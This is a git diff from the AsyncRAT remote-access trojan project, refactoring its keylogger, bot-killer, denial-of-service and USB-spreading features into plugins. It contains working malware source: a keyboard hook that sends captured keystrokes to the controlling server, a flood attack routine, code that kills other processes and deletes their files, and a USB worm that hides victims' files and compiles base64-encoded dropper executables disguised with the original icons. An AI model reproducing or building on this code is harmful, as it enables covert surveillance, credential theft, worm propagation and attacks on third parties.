+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else if (iVal <= -128) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD1);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= -32)
+ {
+ ms.WriteByte(0xD0);
+ ms.WriteByte((byte)iVal);
+ }
+ else
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ } // end <0
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs
similarity index 80%
rename from AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
rename to AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs
index 361502e..f7baaea 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleLimeLogger.cs
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Packet.cs
@@ -1,22 +1,42 @@
-using System;
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
+using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
-using System.Windows.Forms;
-using Client.MessagePack;
using System.Threading;
-using Client.Connection;
+using System.Windows.Forms;
-namespace Client.Handle_Packet
+namespace Plugin
{
- // │ Author : NYAN CAT
- // │ Name : LimeLogger v0.1
- // │ Contact : https://github.com/NYAN-x-CAT
+ public static class Packet
+ {
+ public static void Read(object data)
+ {
+ MsgPack unpack_msgpack = new MsgPack();
+ unpack_msgpack.DecodeFromBytes((byte[])data);
+ switch (unpack_msgpack.ForcePathObject("Packet").AsString)
+ {
+ case "keyLogger":
+ {
+ HandleLimeLogger.isON = false;
+ break;
+ }
+ }
+ }
- // This program is distributed for educational purposes only.
+ public static void Error(string ex)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Error";
+ msgpack.ForcePathObject("Error").AsString = ex;
+ Connection.Send(msgpack.Encode2Bytes());
+ }
+ }
- public static class HandleLimeLogger
+ public static class HandleLimeLogger
{
public static bool isON = false;
public static void Run()
@@ -24,16 +44,17 @@ namespace Client.Handle_Packet
_hookID = SetHook(_proc);
new Thread(() =>
{
- while (ClientSocket.IsConnected)
+ while (Connection.IsConnected)
{
- Thread.Sleep(10);
+ Thread.Sleep(1000);
if (isON == false)
{
break;
}
}
UnhookWindowsHookEx(_hookID);
- CurrentActiveWindowTitle = "";
+ Connection.Disconnected();
+ GC.Collect();
Application.Exit();
}).Start();
Application.Run();
@@ -41,11 +62,20 @@ namespace Client.Handle_Packet
private static IntPtr SetHook(LowLevelKeyboardProc proc)
{
- using (Process curProcess = Process.GetCurrentProcess())
- using (ProcessModule curModule = curProcess.MainModule)
+ try
{
- return SetWindowsHookEx(WHKEYBOARDLL, proc,
- GetModuleHandle(curModule.ModuleName), 0);
+ using (Process curProcess = Process.GetCurrentProcess())
+ using (ProcessModule curModule = curProcess.MainModule)
+ {
+ return SetWindowsHookEx(WHKEYBOARDLL, proc,
+ GetModuleHandle(curModule.ModuleName), 0);
+ }
+ }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ isON = false;
+ return IntPtr.Zero;
}
}
@@ -109,8 +139,9 @@ namespace Client.Handle_Packet
}
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "keyLogger";
+ msgpack.ForcePathObject("Hwid").AsString = Connection.Hwid;
msgpack.ForcePathObject("log").AsString = sb.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
return CallNextHookEx(_hookID, nCode, wParam, lParam);
}
@@ -197,4 +228,5 @@ namespace Client.Handle_Packet
#endregion
}
+
}
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
new file mode 100644
index 0000000..9fec2d9
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Plugin.cs
@@ -0,0 +1,33 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public class Plugin
+ {
+ public static Socket Socket;
+ public void Run(Socket socket, X509Certificate2 certificate, string hwid, byte[] msgPack, Mutex mutex, string mtx, string bdos, string install, string installFile)
+ {
+ Debug.WriteLine("Plugin Invoked");
+ Socket = socket;
+ Connection.ServerCertificate = certificate;
+ Connection.Hwid = hwid;
+ new Thread(() =>
+ {
+ Connection.InitializeClient();
+ }).Start();
+
+ while (Connection.IsConnected)
+ {
+ Thread.Sleep(1000);
+ }
+ }
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Properties/AssemblyInfo.cs b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Properties/AssemblyInfo.cs
new file mode 100644
index 0000000..dda705c
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/LimeLogger/LimeLogger/Properties/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("")]
+[assembly: AssemblyCopyright("")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible
+// to COM components. If you need to access a type in this assembly from
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+//[assembly: Guid("dafe686a-461b-402b-bbd7-2a2f4c87c773")]
+
+// Version information for an assembly consists of the following four values:
+//
+// Major Version
+// Minor Version
+// Build Number
+// Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous.sln b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous.sln
new file mode 100644
index 0000000..464fd23
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous.sln
@@ -0,0 +1,25 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Version 16
+VisualStudioVersion = 16.0.29123.88
+MinimumVisualStudioVersion = 10.0.40219.1
+Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Miscellaneous", "Miscellaneous\Miscellaneous.csproj", "{37E20BAF-3577-4CD9-BB39-18675854E255}"
+EndProject
+Global
+ GlobalSection(SolutionConfigurationPlatforms) = preSolution
+ Debug|Any CPU = Debug|Any CPU
+ Release|Any CPU = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(ProjectConfigurationPlatforms) = postSolution
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Debug|Any CPU.Build.0 = Debug|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.ActiveCfg = Release|Any CPU
+ {37E20BAF-3577-4CD9-BB39-18675854E255}.Release|Any CPU.Build.0 = Release|Any CPU
+ EndGlobalSection
+ GlobalSection(SolutionProperties) = preSolution
+ HideSolutionNode = FALSE
+ EndGlobalSection
+ GlobalSection(ExtensibilityGlobals) = postSolution
+ SolutionGuid = {25F73428-705F-4933-8D8E-8E3199E87CAB}
+ EndGlobalSection
+EndGlobal
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs
new file mode 100644
index 0000000..70a0271
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Connection.cs
@@ -0,0 +1,211 @@
+using Plugin.MessagePack;
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Linq;
+using System.Net.Security;
+using System.Net.Sockets;
+using System.Security.Authentication;
+using System.Security.Cryptography.X509Certificates;
+using System.Text;
+using System.Threading;
+
+namespace Plugin
+{
+ public static class Connection
+ {
+ public static Socket TcpClient { get; set; }
+ public static SslStream SslClient { get; set; }
+ public static X509Certificate2 ServerCertificate { get; set; }
+ private static byte[] Buffer { get; set; }
+ private static long Buffersize { get; set; }
+ private static Timer Tick { get; set; }
+ private static MemoryStream MS { get; set; }
+ public static bool IsConnected { get; set; }
+ private static object SendSync { get; } = new object();
+ public static string Hwid { get; set; }
+
+ public static void InitializeClient(byte[] packet)
+ {
+ try
+ {
+
+ TcpClient = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
+ {
+ ReceiveBufferSize = 50 * 1024,
+ SendBufferSize = 50 * 1024,
+ };
+
+ TcpClient.Connect(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[0], Convert.ToInt32(Plugin.Socket.RemoteEndPoint.ToString().Split(':')[1]));
+ if (TcpClient.Connected)
+ {
+ Debug.WriteLine("Plugin Connected!");
+ IsConnected = true;
+ SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate);
+ SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
+ Buffer = new byte[4];
+ MS = new MemoryStream();
+ Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+
+ new Thread(() =>
+ {
+ Packet.Read(packet);
+ }).Start();
+
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ Debug.WriteLine("Disconnected!");
+ IsConnected = false;
+ return;
+ }
+ }
+
+ private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
+ {
+#if DEBUG
+ return true;
+#endif
+ return ServerCertificate.Equals(certificate);
+ }
+
+ public static void Disconnected()
+ {
+
+ try
+ {
+ IsConnected = false;
+ Tick?.Dispose();
+ SslClient?.Dispose();
+ TcpClient?.Dispose();
+ MS?.Dispose();
+ GC.Collect();
+ }
+ catch { }
+ }
+
+ public static void ReadServertData(IAsyncResult ar)
+ {
+ try
+ {
+ if (!TcpClient.Connected || !IsConnected)
+ {
+ IsConnected = false;
+ return;
+ }
+ int recevied = SslClient.EndRead(ar);
+ if (recevied > 0)
+ {
+ MS.Write(Buffer, 0, recevied);
+ if (MS.Length == 4)
+ {
+ Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
+ Debug.WriteLine("/// Plugin Buffersize " + Buffersize.ToString() + " Bytes ///");
+ MS.Dispose();
+ MS = new MemoryStream();
+ if (Buffersize > 0)
+ {
+ Buffer = new byte[Buffersize];
+ while (MS.Length != Buffersize)
+ {
+ int rc = SslClient.Read(Buffer, 0, Buffer.Length);
+ if (rc == 0)
+ {
+ IsConnected = false;
+ return;
+ }
+ MS.Write(Buffer, 0, rc);
+ Buffer = new byte[Buffersize - MS.Length];
+ }
+ if (MS.Length == Buffersize)
+ {
+ Thread thread = new Thread(new ParameterizedThreadStart(Packet.Read));
+ thread.Start(MS.ToArray());
+ Buffer = new byte[4];
+ MS.Dispose();
+ MS = new MemoryStream();
+ }
+ }
+ }
+ SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
+ }
+ else
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+
+ public static void Send(byte[] msg)
+ {
+ lock (SendSync)
+ {
+ try
+ {
+ if (!IsConnected || msg == null)
+ {
+ return;
+ }
+
+ byte[] buffersize = BitConverter.GetBytes(msg.Length);
+ TcpClient.Poll(-1, SelectMode.SelectWrite);
+ SslClient.Write(buffersize, 0, buffersize.Length);
+
+ if (msg.Length > 1000000) //1mb
+ {
+ int chunkSize = 50 * 1024;
+ byte[] chunk = new byte[chunkSize];
+ using (MemoryStream buffereReader = new MemoryStream(msg))
+ {
+ BinaryReader binaryReader = new BinaryReader(buffereReader);
+ int bytesToRead = (int)buffereReader.Length;
+ do
+ {
+ chunk = binaryReader.ReadBytes(chunkSize);
+ bytesToRead -= chunkSize;
+ SslClient.Write(chunk, 0, chunk.Length);
+ SslClient.Flush();
+ } while (bytesToRead > 0);
+
+ binaryReader.Dispose();
+ }
+ }
+ else
+ {
+ SslClient.Write(msg, 0, msg.Length);
+ SslClient.Flush();
+ }
+ Debug.WriteLine("Plugin Packet Sent");
+ }
+ catch
+ {
+ IsConnected = false;
+ return;
+ }
+ }
+ }
+
+ public static void CheckServer(object obj)
+ {
+ MsgPack msgpack = new MsgPack();
+ msgpack.ForcePathObject("Packet").AsString = "Ping!)";
+ Send(msgpack.Encode2Bytes());
+ GC.Collect();
+ }
+
+ }
+}
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xml b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xml
new file mode 100644
index 0000000..5029e70
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xml
@@ -0,0 +1,3 @@
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xsd b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xsd
new file mode 100644
index 0000000..44a5374
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/FodyWeavers.xsd
@@ -0,0 +1,111 @@
+
+
+
+
+
+
+
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with line breaks
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with line breaks.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with line breaks.
+
+
+
+
+ The order of preloaded assemblies, delimited with line breaks.
+
+
+
+
+
+ This will copy embedded files to disk before loading them into memory. This is helpful for some scenarios that expected an assembly to be loaded from a physical file.
+
+
+
+
+ Controls if .pdbs for reference assemblies are also embedded.
+
+
+
+
+ Embedded assemblies are compressed by default, and uncompressed when they are loaded. You can turn compression off with this option.
+
+
+
+
+ As part of Costura, embedded assemblies are no longer included as part of the build. This cleanup can be turned off.
+
+
+
+
+ Costura by default will load as part of the module initialization. This flag disables that behavior. Make sure you call CosturaUtility.Initialize() somewhere in your code.
+
+
+
+
+ Costura will by default use assemblies with a name like 'resources.dll' as a satellite resource and prepend the output path. This flag disables that behavior.
+
+
+
+
+ A list of assembly names to exclude from the default action of "embed all Copy Local references", delimited with |
+
+
+
+
+ A list of assembly names to include from the default action of "embed all Copy Local references", delimited with |.
+
+
+
+
+ A list of unmanaged 32 bit assembly names to include, delimited with |.
+
+
+
+
+ A list of unmanaged 64 bit assembly names to include, delimited with |.
+
+
+
+
+ The order of preloaded assemblies, delimited with |.
+
+
+
+
+
+
+
+ 'true' to run assembly verification (PEVerify) on the target assembly after all weavers have been executed.
+
+
+
+
+ A comma-separated list of error codes that can be safely ignored in assembly verification.
+
+
+
+
+ 'false' to turn off automatic generation of the XML Schema file.
+
+
+
+
+
\ No newline at end of file
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleBotKiller.cs
similarity index 81%
rename from AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
rename to AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleBotKiller.cs
index 4402c10..94f6fed 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleBotKiller.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleBotKiller.cs
@@ -3,17 +3,11 @@ using System.IO;
using System.Diagnostics;
using System.Runtime.InteropServices;
using Microsoft.Win32;
-using Client.MessagePack;
-using Client.Connection;
using System.Security.Principal;
+using Plugin.MessagePack;
+using Plugin;
-// │ Author : NYAN CAT
-// │ Name : Bot Killer v0.2.5
-// │ Contact : https://github.com/NYAN-x-CAT
-
-// This program Is distributed for educational purposes only.
-
-namespace Client.Handle_Packet
+namespace Miscellaneous.Handler
{
public class HandleBotKiller
{
@@ -25,15 +19,16 @@ namespace Client.Handle_Packet
{
try
{
- if (Inspection(p.MainModule.FileName))
+ if (Inspection(p.MainModule.FileName.ToLower()))
if (!IsWindowVisible(p.MainWindowHandle))
{
string pName = p.MainModule.FileName;
p.Kill();
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\Run", pName);
RegistryDelete(@"Software\Microsoft\Windows\CurrentVersion\RunOnce", pName);
- System.Threading.Thread.Sleep(100);
+ System.Threading.Thread.Sleep(200);
File.Delete(pName);
+ System.Threading.Thread.Sleep(200);
count++;
}
}
@@ -44,17 +39,17 @@ namespace Client.Handle_Packet
MsgPack msgpack = new MsgPack();
msgpack.ForcePathObject("Packet").AsString = "BotKiller";
msgpack.ForcePathObject("Count").AsString = count.ToString();
- ClientSocket.Send(msgpack.Encode2Bytes());
+ Connection.Send(msgpack.Encode2Bytes());
}
}
private bool Inspection(string threat)
{
- if (threat == Process.GetCurrentProcess().MainModule.FileName) return false;
- if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData))) return true;
- if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile))) return true;
+ if (threat == Process.GetCurrentProcess().MainModule.FileName.ToLower()) return false;
+ if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData).ToLower())) return true;
+ if (threat.StartsWith(Environment.GetFolderPath(Environment.SpecialFolder.UserProfile).ToLower())) return true;
if (threat.Contains("wscript.exe")) return true;
- if (threat.StartsWith(Path.Combine(Path.GetPathRoot(Environment.SystemDirectory), "Windows\\Microsoft.NET"))) return true;
+ if (threat.StartsWith(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.Windows), "Microsoft.NET").ToLower())) return true;
return false;
}
@@ -99,4 +94,5 @@ namespace Client.Handle_Packet
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool IsWindowVisible(IntPtr hWnd);
}
+
}
diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleDos.cs
similarity index 84%
rename from AsyncRAT-C#/Client/Handle Packet/HandleDos.cs
rename to AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleDos.cs
index 5beecb8..07853a3 100644
--- a/AsyncRAT-C#/Client/Handle Packet/HandleDos.cs
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleDos.cs
@@ -1,21 +1,12 @@
-using Client.MessagePack;
-using Client.Connection;
-using System;
-using System.Collections.Generic;
+using System;
using System.Diagnostics;
-using System.Globalization;
-using System.Linq;
using System.Net.Sockets;
using System.Text;
using System.Threading;
+using Plugin.MessagePack;
+using Plugin;
-// │ Author : NYAN CAT
-// │ Name : DOS-Attack-Post 0.2
-// │ Contact : https://github.com/NYAN-x-CAT
-
-// This program is distributed for educational purposes only.
-
-namespace Client.Handle_Packet
+namespace Miscellaneous.Handler
{
public class HandleDos
{
@@ -39,7 +30,7 @@ namespace Client.Handle_Packet
Debug.WriteLine($"Host:{host} Port:{port} Timeout:{timeout}");
- while (!Packet.ctsDos.IsCancellationRequested && timespan > stopwatch.Elapsed && ClientSocket.IsConnected)
+ while (!Packet.ctsDos.IsCancellationRequested && timespan > stopwatch.Elapsed && Connection.IsConnected)
{
for (int i = 0; i < 20; i++)
{
@@ -64,7 +55,12 @@ namespace Client.Handle_Packet
Thread.Sleep(5000);
}
}
- catch { return; }
+ catch (Exception ex)
+ {
+ Packet.Error(ex.Message);
+ Packet.ctsDos.Cancel();
+ }
}
}
+
}
diff --git a/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleLimeUSB.cs b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleLimeUSB.cs
new file mode 100644
index 0000000..9bfa52a
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/Miscellaneous/Miscellaneous/Handler/HandleLimeUSB.cs
@@ -0,0 +1,226 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.IO;
+using System.Text;
+using System.Drawing.IconLib;
+using System.Windows.Forms;
+using Microsoft.Win32;
+using System.Drawing;
+using Microsoft.CSharp;
+using System.CodeDom.Compiler;
+using Microsoft.VisualBasic.Devices;
+
+
+namespace Miscellaneous.Handler
+{
+ class HandleLimeUSB
+ {
+ public void Initialize()
+ {
+ ExplorerOptions();
+
+ foreach (DriveInfo usb in DriveInfo.GetDrives())
+ {
+ try
+ {
+ if (usb.DriveType == DriveType.Removable && usb.IsReady)
+ {
+ if (!Directory.Exists(usb.RootDirectory.ToString() + Settings.WorkDirectory))
+ {
+ Directory.CreateDirectory(usb.RootDirectory.ToString() + Settings.WorkDirectory);
+ File.SetAttributes(usb.RootDirectory.ToString() + Settings.WorkDirectory, FileAttributes.System | FileAttributes.Hidden);
+ }
+
+ if (!Directory.Exists((usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.IconsDirectory)))
+ Directory.CreateDirectory((usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.IconsDirectory));
+
+ if (!File.Exists(usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile))
+ File.Copy(Application.ExecutablePath, usb.RootDirectory.ToString() + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile);
+
+ CreteDirectory(usb.RootDirectory.ToString());
+ InfectFiles(usb.RootDirectory.ToString());
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("Initialize " + ex.Message);
+ }
+ }
+ }
+
+ public void ExplorerOptions()
+ {
+ try
+ {
+ RegistryKey key = Registry.CurrentUser.OpenSubKey(@"Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", true);
+ if (key.GetValue("Hidden") != (object)2)
+ key.SetValue("Hidden", 2);
+ if (key.GetValue("HideFileExt") != (object)1)
+ key.SetValue("HideFileExt", 1);
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("ExplorerOptions: " + ex.Message);
+ }
+ }
+
+ public void InfectFiles(string path)
+ {
+ foreach (var file in Directory.GetFiles(path))
+ {
+ try
+ {
+ if (CheckIfInfected(file))
+ {
+ ChangeIcon(file);
+ File.Move(file, file.Insert(3, Settings.WorkDirectory + "\\"));
+ CompileFile(file);
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("InfectFiles " + ex.Message);
+ }
+ }
+
+ foreach (var directory in Directory.GetDirectories(path))
+ {
+ if (!directory.Contains(Settings.WorkDirectory))
+ InfectFiles(directory);
+ }
+ }
+
+ public void CreteDirectory(string usbDirectory)
+ {
+ foreach (var directory in Directory.GetDirectories(usbDirectory))
+ {
+ try
+ {
+ if (!directory.Contains(Settings.WorkDirectory))
+ {
+ if (!Directory.Exists(directory.Insert(3, Settings.WorkDirectory + "\\")))
+ Directory.CreateDirectory(directory.Insert(3, Settings.WorkDirectory + "\\"));
+ CreteDirectory(directory);
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("CreteDirectory: " + ex.Message);
+ }
+ }
+ }
+
+ public bool CheckIfInfected(string file)
+ {
+ try
+ {
+ FileVersionInfo info = FileVersionInfo.GetVersionInfo(file);
+ if (info.LegalTrademarks == Settings.InfectedTrademark)
+ return false;
+ else
+ return true;
+ }
+ catch
+ {
+ return false;
+ }
+ }
+
+ public void ChangeIcon(string file)
+ {
+ try
+ {
+ Icon fileIcon = Icon.ExtractAssociatedIcon(file);
+ MultiIcon multiIcon = new MultiIcon();
+ SingleIcon singleIcon = multiIcon.Add(Path.GetFileName(file));
+ singleIcon.CreateFrom(fileIcon.ToBitmap(), IconOutputFormat.Vista);
+ singleIcon.Save(Path.GetPathRoot(file) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(file.Replace(" ", null)) + ".ico");
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("ChangeIcon: " + ex.Message);
+ }
+ }
+
+ public void CompileFile(string infectedFile)
+ {
+ try
+ {
+ string source = Encoding.UTF8.GetString(Convert.FromBase64String("dXNpbmcgU3lzdGVtOwp1c2luZyBTeXN0ZW0uRGlhZ25vc3RpY3M7CnVzaW5nIFN5c3RlbS5SZWZsZWN0aW9uOwp1c2luZyBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXM7CgpbYXNzZW1ibHk6IEFzc2VtYmx5VHJhZGVtYXJrKCIlTGltZSUiKV0KW2Fzc2VtYmx5OiBHdWlkKCIlR3VpZCUiKV0KCnN0YXRpYyBjbGFzcyAlTGltZVVTQk1vZHVsZSUKewogICAgcHVibGljIHN0YXRpYyB2b2lkIE1haW4oKQogICAgewogICAgICAgIHRyeQogICAgICAgIHsKICAgICAgICAgICAgU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MuU3RhcnQoQCIlRmlsZSUiKTsKICAgICAgICB9CiAgICAgICAgY2F0Y2ggeyB9CiAgICAgICAgdHJ5CiAgICAgICAgewogICAgICAgICAgICBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzcy5TdGFydChAIiVQYXlsb2FkJSIpOwogICAgICAgIH0KICAgICAgICBjYXRjaCB7IH0KICAgIH0KfQ=="));
+ source = source.Replace("%Payload%", Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.LimeUSBFile);
+ source = source.Replace("%File%", infectedFile.Insert(3, Settings.WorkDirectory + "\\"));
+ source = source.Replace("%Lime%", Settings.InfectedTrademark);
+ source = source.Replace("%LimeUSBModule%", Randomz(new Random().Next(6, 12)));
+ source = source.Replace("%Guid%", Guid.NewGuid().ToString());
+
+ string[] referencedAssemblies = new string[] { "System.dll" };
+
+ var providerOptions = new Dictionary() {
+ {"CompilerVersion", "v4.0" }
+ };
+
+ var compilerOptions = "/target:winexe /platform:anycpu /optimize+";
+ if (File.Exists(Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"))
+ {
+ compilerOptions += $" /win32icon:\"{Path.GetPathRoot(infectedFile) + Settings.WorkDirectory + "\\" + Settings.IconsDirectory + "\\" + Path.GetFileNameWithoutExtension(infectedFile.Replace(" ", null)) + ".ico"}\"";
+ }
+
+ using (var cSharpCodeProvider = new CSharpCodeProvider(providerOptions))
+ {
+ var compilerParameters = new CompilerParameters(referencedAssemblies)
+ {
+ GenerateExecutable = true,
+ OutputAssembly = infectedFile + ".scr",
+ CompilerOptions = compilerOptions,
+ TreatWarningsAsErrors = false,
+ IncludeDebugInformation = false,
+ };
+ var compilerResults = cSharpCodeProvider.CompileAssemblyFromSource(compilerParameters, source);
+
+ //if (compilerResults.Errors.Count > 0)
+ //{
+ // MessageBox.Show(string.Format("The compiler has encountered {0} errors",
+ // compilerResults.Errors.Count), "Errors while compiling", MessageBoxButtons.OK,
+ // MessageBoxIcon.Error);
+
+ // foreach (CompilerError compilerError in compilerResults.Errors)
+ // {
+ // MessageBox.Show(string.Format("{0}\nLine: {1} - Column: {2}\nFile: {3}", compilerError.ErrorText,
+ // compilerError.Line, compilerError.Column, compilerError.FileName), "Error",
+ // MessageBoxButtons.OK, MessageBoxIcon.Error);
+ // }
+ //}
+ }
+ }
+ catch (Exception ex)
+ {
+ Debug.WriteLine("CompileFile " + ex.Message);
+ }
+ }
+
+ public string Randomz(int L)
+ {
+ string validchars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+ StringBuilder sb = new StringBuilder();
+ Random rand = new Random();
+ for (int i = 1; i <= L; i++)
+ {
+ int idx = rand.Next(0, validchars.Length);
